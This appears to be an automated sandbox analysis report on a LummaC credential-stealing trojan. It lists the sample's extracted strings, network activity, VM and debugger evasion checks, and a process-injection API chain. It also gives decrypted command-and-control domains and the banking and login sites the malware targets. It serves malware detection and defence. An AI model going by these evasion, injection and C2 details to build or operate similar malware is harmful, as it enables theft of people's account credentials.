Source: random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: random.exe.10.exe, 00000003.00000003.1531067920.00000000036CA000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531338623.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531203126.00000000036C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: random.exe.10.exe, 00000003.00000003.1583103062.0000000003729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: random.exe.10.exe, 00000003.00000003.1581528059.00000000039BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.23.76:443 -> 192.168.2.9:49723 version: TLS 1.2

Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 0_2_00E91000	0_2_00E91000
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 0_2_00E94C8C	0_2_00E94C8C
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 0_2_00EA6F3A	0_2_00EA6F3A
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E1368A	3_3_00E1368A
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E1368A	3_3_00E1368A
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E1368A	3_3_00E1368A
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E1368A	3_3_00E1368A
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E1368A	3_3_00E1368A
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E1368A	3_3_00E1368A
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E1368A	3_3_00E1368A
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E1368A	3_3_00E1368A
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E1368A	3_3_00E1368A
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E1368A	3_3_00E1368A
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E1368A	3_3_00E1368A
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E1368A	3_3_00E1368A
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E1368A	3_3_00E1368A
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E1368A	3_3_00E1368A
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E1368A	3_3_00E1368A
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E1368A	3_3_00E1368A

Source: C:\Users\user\Desktop\random.exe.10.exe

Code function: String function: 00E95190 appears 46 times

Source: random.exe.10.exe

Static PE information: invalid certificate

Source: random.exe.10.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: random.exe.10.exe	Static PE information: Section: .bss ZLIB complexity 1.0003343485169491
Source: random.exe.10.exe	Static PE information: Section: .bss ZLIB complexity 1.0003343485169491

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/0@1/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03

Source: C:\Users\user\Desktop\random.exe.10.exe

Command line argument: .

0_2_00E9E280

Source: C:\Users\user\Desktop\random.exe.10.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: random.exe.10.exe, 00000003.00000003.1532325137.000000000369A000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1556569395.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1531882949.00000000036B5000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: random.exe.10.exe

ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\random.exe.10.exe

File read: C:\Users\user\Desktop\random.exe.10.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\random.exe.10.exe "C:\Users\user\Desktop\random.exe.10.exe"
Source: C:\Users\user\Desktop\random.exe.10.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\random.exe.10.exe	Process created: C:\Users\user\Desktop\random.exe.10.exe "C:\Users\user\Desktop\random.exe.10.exe"
Source: C:\Users\user\Desktop\random.exe.10.exe	Process created: C:\Users\user\Desktop\random.exe.10.exe "C:\Users\user\Desktop\random.exe.10.exe"	Jump to behavior

Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: random.exe.10.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE

Source: random.exe.10.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: random.exe.10.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: random.exe.10.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: random.exe.10.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: random.exe.10.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 0_2_00E9534A push ecx; ret	0_2_00E9535D
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0A3F1 push eax; ret	3_3_00E0A459
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0A3F1 push eax; ret	3_3_00E0A459
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0DCF9 push edi; ret	3_3_00E0DCFA
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0DCF9 push edi; ret	3_3_00E0DCFA
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0DCF9 push edi; ret	3_3_00E0DCFA
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E05FD8 push eax; iretd	3_3_00E05FD9
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E08DB0 push eax; iretd	3_3_00E08DB1
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E08DB0 push eax; iretd	3_3_00E08DB1
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0B5B9 pushad ; retf	3_3_00E0B631
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0B5B9 pushad ; retf	3_3_00E0B631
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0A27F push eax; ret	3_3_00E0A459
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0A27F push eax; ret	3_3_00E0A459
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0CB10 push ds; iretd	3_3_00E0CB19
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0CB10 push ds; iretd	3_3_00E0CB19
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0CB10 push ds; iretd	3_3_00E0CB19
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0A3F1 push eax; ret	3_3_00E0A459
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0A3F1 push eax; ret	3_3_00E0A459
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0DCF9 push edi; ret	3_3_00E0DCFA
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0DCF9 push edi; ret	3_3_00E0DCFA
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0DCF9 push edi; ret	3_3_00E0DCFA
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E05FD8 push eax; iretd	3_3_00E05FD9
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E08DB0 push eax; iretd	3_3_00E08DB1
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E08DB0 push eax; iretd	3_3_00E08DB1
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0B5B9 pushad ; retf	3_3_00E0B631
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0B5B9 pushad ; retf	3_3_00E0B631
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0A27F push eax; ret	3_3_00E0A459
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0A27F push eax; ret	3_3_00E0A459
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0CB10 push ds; iretd	3_3_00E0CB19
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0CB10 push ds; iretd	3_3_00E0CB19
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 3_3_00E0CB10 push ds; iretd	3_3_00E0CB19

Source: C:\Users\user\Desktop\random.exe.10.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\random.exe.10.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\random.exe.10.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe.10.exe TID: 7932	Thread sleep time: -210000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\random.exe.10.exe TID: 7952	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\random.exe.10.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 0_2_00EA36A9 FindFirstFileExW,		0_2_00EA36A9
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 0_2_00EA375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_00EA375A

Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: random.exe.10.exe, 00000003.00000003.1737571443.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000002.1738560783.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW<
Source: random.exe.10.exe, 00000003.00000002.1738560783.0000000000D99000.00000004.00000020.00020000.00000000.sdmp, random.exe.10.exe, 00000003.00000003.1737571443.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: random.exe.10.exe, 00000003.00000003.1556113641.0000000003734000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696497155p
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: random.exe.10.exe, 00000003.00000003.1556113641.000000000372F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\random.exe.10.exe

API call chain: ExitProcess graph end node

graph_0-14489

Source: C:\Users\user\Desktop\random.exe.10.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe.10.exe

Code function: 0_2_00E95020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00E95020

Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 0_2_00EB519E mov edi, dword ptr fs:[00000030h]		0_2_00EB519E
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 0_2_00E91614 mov edi, dword ptr fs:[00000030h]		0_2_00E91614

Source: C:\Users\user\Desktop\random.exe.10.exe

Code function: 0_2_00E9FE2C GetProcessHeap,

0_2_00E9FE2C

Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 0_2_00E95020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00E95020
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 0_2_00E95014 SetUnhandledExceptionFilter,	0_2_00E95014
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 0_2_00E9B4B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00E9B4B9
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: 0_2_00E94C64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00E94C64

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\random.exe.10.exe

Code function: 0_2_00EB519E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_00EB519E

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\random.exe.10.exe

Memory written: C:\Users\user\Desktop\random.exe.10.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rapeflowwj.lat
Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: crosshuaht.lat
Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: sustainskelet.lat
Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: aspecteirs.lat
Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: energyaffai.lat
Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: necklacebudi.lat
Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: discokeyus.lat
Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: grannyejh.lat
Source: random.exe.10.exe, 00000000.00000002.1476298750.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: pancakedipyps.click

Source: C:\Users\user\Desktop\random.exe.10.exe

Process created: C:\Users\user\Desktop\random.exe.10.exe "C:\Users\user\Desktop\random.exe.10.exe"

Jump to behavior

Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: GetLocaleInfoW,	0_2_00EA30D1
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: EnumSystemLocalesW,	0_2_00EA3086
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00EA3178
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: GetLocaleInfoW,	0_2_00EA327E
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: GetLocaleInfoW,	0_2_00E9F21C
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00EA2A13
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00EA2CFF
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: EnumSystemLocalesW,	0_2_00EA2C64
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: GetLocaleInfoW,	0_2_00EA2FB1
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: EnumSystemLocalesW,	0_2_00EA2F52
Source: C:\Users\user\Desktop\random.exe.10.exe	Code function: EnumSystemLocalesW,	0_2_00E9F717

Source: C:\Users\user\Desktop\random.exe.10.exe

